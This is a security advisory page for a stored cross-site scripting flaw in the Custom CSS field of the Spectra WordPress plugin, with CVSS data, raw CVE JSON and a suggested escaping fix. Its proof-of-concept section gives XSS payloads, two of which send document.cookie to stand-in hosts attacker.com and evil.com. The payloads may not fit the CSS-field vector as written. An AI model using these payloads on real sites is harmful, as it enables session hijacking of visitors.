Security Vulnerability Report
CVE-2025-11162 CVSS 6.4 MEDIUM

CVE-2025-11162

Published: 2025-11-05 05:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Spectra Gutenberg Blocks – Website Builder for the Block Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS in all versions up to, and including, 2.19.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Spectra Gutenberg Blocks (Ultimate Addons for Gutenberg) ≤ 2.19.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Performed after logging in with a WordPress Contributor-level account -->
<!-- Inject the following into the page editor's Custom CSS field: -->

<!-- PoC 1: basic alert test -->
<script>alert(document.cookie)</script>

<!-- PoC 2: event-handler XSS -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- PoC 3: persistent cookie theft -->
<script>
var img = new Image();
img.src = 'https://evil.com/log?c=' + encodeURIComponent(document.cookie);
</script>

php
// Example of the corrected, safe approach:
// the plugin should filter and escape user input with wp_kses() or esc_html()/esc_attr()
// before it is emitted. Note that esc_html() stops a </style> breakout but also
// entity-encodes legitimate CSS characters such as > and quotes; for CSS emitted
// inside a <style> element, stripping tag characters (wp_strip_all_tags()) keeps
// valid CSS intact while removing the injected markup.
function safe_css_output( $css ) {
    return esc_html( $css );
}

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11162",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-05T05:15:41.400",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Spectra Gutenberg Blocks – Website Builder for the Block Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS in all versions up to, and including, 2.19.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "references": [
      { "url": "https://plugins.trac.wordpress.org/browser/ultimate-addons-for-gutenberg/tags/2.19.14/classes/class-uagb-loader.php#L522", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/ultimate-addons-for-gutenberg/tags/2.19.14/classes/class-uagb-post-assets.php#L1418", "source": "[email protected]" },
      { "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f077817-704f-4595-bfb1-80234dd23f8d?source=cve", "source": "[email protected]" }
    ]
  }
}